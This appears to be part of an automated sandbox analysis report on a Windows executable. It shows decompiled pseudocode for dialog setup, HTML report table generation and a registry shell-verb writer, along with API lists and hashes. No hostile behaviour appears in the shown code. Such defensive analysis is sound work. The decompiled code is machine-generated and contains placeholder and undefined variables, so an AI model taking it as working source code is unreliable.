                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                            • API String ID: 3143752011-1996832678
                                                                                                                            • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                            • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                            • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                            • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 97%
                                                                                                                            			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                                            0x00403c09
                                                                                                                            0x00403c0c
                                                                                                                            0x00403c11
                                                                                                                            0x00403c1b
                                                                                                                            0x00403c3f
                                                                                                                            0x00403c4a
                                                                                                                            0x00403c6e
                                                                                                                            0x00403c96
                                                                                                                            0x00403c9a
                                                                                                                            0x00403ca6
                                                                                                                            0x00403cb3
                                                                                                                            0x00403cb8
                                                                                                                            0x00403cc5
                                                                                                                            0x00403cca
                                                                                                                            0x00403cdd
                                                                                                                            0x00403ce6
                                                                                                                            0x00403cf8
                                                                                                                            0x00403d11
                                                                                                                            0x00403d26
                                                                                                                            0x00403d3f
                                                                                                                            0x00403d54
                                                                                                                            0x00403d6d
                                                                                                                            0x00403d76
                                                                                                                            0x00403d88
                                                                                                                            0x00403d9e
                                                                                                                            0x00403db0
                                                                                                                            0x00403db5
                                                                                                                            0x00403dc4
                                                                                                                            0x00403dc8
                                                                                                                            0x00403dc9
                                                                                                                            0x00403dca
                                                                                                                            0x00403dda
                                                                                                                            0x00403ddf
                                                                                                                            0x00403de2
                                                                                                                            0x00403de3
                                                                                                                            0x00403df4
                                                                                                                            0x00403df8
                                                                                                                            0x00403df9
                                                                                                                            0x00403dfa
                                                                                                                            0x00403e0a
                                                                                                                            0x00403e0f
                                                                                                                            0x00403e12
                                                                                                                            0x00403e13
                                                                                                                            0x00403e22
                                                                                                                            0x00403e26
                                                                                                                            0x00403e28
                                                                                                                            0x00403e29
                                                                                                                            0x00403e39
                                                                                                                            0x00403e3e
                                                                                                                            0x00403e41
                                                                                                                            0x00403e42
                                                                                                                            0x00403e51
                                                                                                                            0x00403e55
                                                                                                                            0x00403e57
                                                                                                                            0x00403e58
                                                                                                                            0x00403e68
                                                                                                                            0x00403e6d
                                                                                                                            0x00403e70
                                                                                                                            0x00403e71
                                                                                                                            0x00403e71
                                                                                                                            0x00403e87
                                                                                                                            0x00403e8d
                                                                                                                            0x00403e9e
                                                                                                                            0x00403ea6
                                                                                                                            0x00403eaf
                                                                                                                            0x00403ebc

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                              • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                              • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                              • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                            • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                            • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                            • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                              • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                              • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                              • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                              • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                            • LoadImageW.USER32 ref: 00403C6A
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                            • LoadImageW.USER32 ref: 00403C7F
                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                            • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                              • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                              • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                            • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                            • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                              • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                              • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                              • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                              • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                              • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                              • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                              • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                              • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                            • GetDlgItem.USER32 ref: 00403D64
                                                                                                                            • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                            • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                            • GetDlgItem.USER32 ref: 00403E20
                                                                                                                            • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                            • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                            • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                            • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1038210931-0
                                                                                                                            • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                            • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                            • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                            • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 56%
                                                                                                                            			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                                                            0x00407763
                                                                                                                            0x0040776c
                                                                                                                            0x00407784
                                                                                                                            0x0040778b
                                                                                                                            0x00407797
                                                                                                                            0x00407799
                                                                                                                            0x0040779b
                                                                                                                            0x004077a7
                                                                                                                            0x004077ae
                                                                                                                            0x004077bd
                                                                                                                            0x004077c4
                                                                                                                            0x004077d3
                                                                                                                            0x004077da
                                                                                                                            0x004077e1
                                                                                                                            0x004077e6
                                                                                                                            0x004077f2
                                                                                                                            0x004077f5
                                                                                                                            0x00407804
                                                                                                                            0x00407805
                                                                                                                            0x00407810
                                                                                                                            0x00407812
                                                                                                                            0x00407813
                                                                                                                            0x00407818
                                                                                                                            0x00407818
                                                                                                                            0x00407825
                                                                                                                            0x0040782d
                                                                                                                            0x00407830
                                                                                                                            0x0040783a
                                                                                                                            0x00407840
                                                                                                                            0x00407846
                                                                                                                            0x00407849
                                                                                                                            0x00407850
                                                                                                                            0x0040785e
                                                                                                                            0x00407864
                                                                                                                            0x00407867
                                                                                                                            0x0040786b
                                                                                                                            0x0040786f
                                                                                                                            0x00407877
                                                                                                                            0x0040787a
                                                                                                                            0x00407885
                                                                                                                            0x00407892
                                                                                                                            0x004078a8
                                                                                                                            0x004078b8
                                                                                                                            0x004078c5
                                                                                                                            0x004078ff
                                                                                                                            0x004078c7
                                                                                                                            0x004078ca
                                                                                                                            0x004078dd
                                                                                                                            0x004078de
                                                                                                                            0x004078e3
                                                                                                                            0x004078e8
                                                                                                                            0x004078eb
                                                                                                                            0x004078f0
                                                                                                                            0x004078f0
                                                                                                                            0x00407906
                                                                                                                            0x00407909
                                                                                                                            0x0040790f
                                                                                                                            0x0040791d
                                                                                                                            0x00407923
                                                                                                                            0x0040792d
                                                                                                                            0x00407932
                                                                                                                            0x0040793b
                                                                                                                            0x00407942
                                                                                                                            0x00407943
                                                                                                                            0x0040794c
                                                                                                                            0x00407953
                                                                                                                            0x00407954
                                                                                                                            0x00407959
                                                                                                                            0x0040795c
                                                                                                                            0x00407961
                                                                                                                            0x0040796c
                                                                                                                            0x00407971
                                                                                                                            0x0040797a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407838
                                                                                                                            0x00407838
                                                                                                                            0x0040783a
                                                                                                                            0x00407980
                                                                                                                            0x0040798a
                                                                                                                            0x004079a1

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                            • API String ID: 1607361635-601624466
                                                                                                                            • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                            • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                            • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                            • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 40%
                                                                                                                            			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                                            0x00407b65
                                                                                                                            0x00407b7c
                                                                                                                            0x00407b83
                                                                                                                            0x00407b91
                                                                                                                            0x00407b98
                                                                                                                            0x00407ba6
                                                                                                                            0x00407bad
                                                                                                                            0x00407bb2
                                                                                                                            0x00407bb9
                                                                                                                            0x00407bca
                                                                                                                            0x00407bcb
                                                                                                                            0x00407bd6
                                                                                                                            0x00407bdb
                                                                                                                            0x00407bdc
                                                                                                                            0x00407be1
                                                                                                                            0x00407be1
                                                                                                                            0x00407be8
                                                                                                                            0x00407bf9
                                                                                                                            0x00407bfa
                                                                                                                            0x00407c05
                                                                                                                            0x00407c0a
                                                                                                                            0x00407c0b
                                                                                                                            0x00407c1c
                                                                                                                            0x00407c21
                                                                                                                            0x00407c21
                                                                                                                            0x00407c2a
                                                                                                                            0x00407c2b
                                                                                                                            0x00407c36
                                                                                                                            0x00407c3b
                                                                                                                            0x00407c3c
                                                                                                                            0x00407c41
                                                                                                                            0x00407c51
                                                                                                                            0x00407c56
                                                                                                                            0x00407c5b
                                                                                                                            0x00407c65
                                                                                                                            0x00407c68
                                                                                                                            0x00407c6b
                                                                                                                            0x00407c74
                                                                                                                            0x00407c7b
                                                                                                                            0x00407c80
                                                                                                                            0x00407c82
                                                                                                                            0x00407c88
                                                                                                                            0x00407ca6
                                                                                                                            0x00407c8a
                                                                                                                            0x00407c8a
                                                                                                                            0x00407c8b
                                                                                                                            0x00407c96
                                                                                                                            0x00407c9b
                                                                                                                            0x00407c9c
                                                                                                                            0x00407ca1
                                                                                                                            0x00407ca1
                                                                                                                            0x00407cb3
                                                                                                                            0x00407cb4
                                                                                                                            0x00407cbd
                                                                                                                            0x00407cc4
                                                                                                                            0x00407cc5
                                                                                                                            0x00407cd0
                                                                                                                            0x00407cd5
                                                                                                                            0x00407cd6
                                                                                                                            0x00407cdb
                                                                                                                            0x00407ceb
                                                                                                                            0x00407cf0
                                                                                                                            0x00407cf3
                                                                                                                            0x00407cf3
                                                                                                                            0x00407cf3
                                                                                                                            0x00000000
                                                                                                                            0x00407cfc
                                                                                                                            0x00407d00

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: _snwprintf$memset$wcscpy
                                                                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                            • API String ID: 2000436516-3842416460
                                                                                                                            • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                            • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                            • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                            • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 51%
                                                                                                                            			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                                            0x00404415
                                                                                                                            0x0040441d
                                                                                                                            0x0040442c
                                                                                                                            0x00404435
                                                                                                                            0x004045b3
                                                                                                                            0x004045b7
                                                                                                                            0x004045b7
                                                                                                                            0x0040444b
                                                                                                                            0x00404452
                                                                                                                            0x00404457
                                                                                                                            0x00404460
                                                                                                                            0x00404461
                                                                                                                            0x00404462
                                                                                                                            0x0040446d
                                                                                                                            0x00404472
                                                                                                                            0x00404473
                                                                                                                            0x00404490
                                                                                                                            0x004044a5
                                                                                                                            0x004044b4
                                                                                                                            0x004044b6
                                                                                                                            0x004044b7
                                                                                                                            0x004044bd
                                                                                                                            0x004044cf
                                                                                                                            0x004044db
                                                                                                                            0x004044eb
                                                                                                                            0x004044f1
                                                                                                                            0x004044f6
                                                                                                                            0x004044f9
                                                                                                                            0x004044fe
                                                                                                                            0x00404506
                                                                                                                            0x00404507
                                                                                                                            0x00404508
                                                                                                                            0x00404510
                                                                                                                            0x00404521
                                                                                                                            0x00404532
                                                                                                                            0x00404539
                                                                                                                            0x00404547
                                                                                                                            0x0040454e
                                                                                                                            0x0040455b
                                                                                                                            0x0040455c
                                                                                                                            0x00404564
                                                                                                                            0x0040456f
                                                                                                                            0x00404570
                                                                                                                            0x00404571
                                                                                                                            0x0040457c
                                                                                                                            0x0040457d
                                                                                                                            0x00404588
                                                                                                                            0x00404589
                                                                                                                            0x0040458a
                                                                                                                            0x004045a0
                                                                                                                            0x004045a5
                                                                                                                            0x00404521
                                                                                                                            0x004044eb
                                                                                                                            0x004045ab
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00404452
                                                                                                                            • _snwprintf.MSVCRT ref: 00404473
                                                                                                                              • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
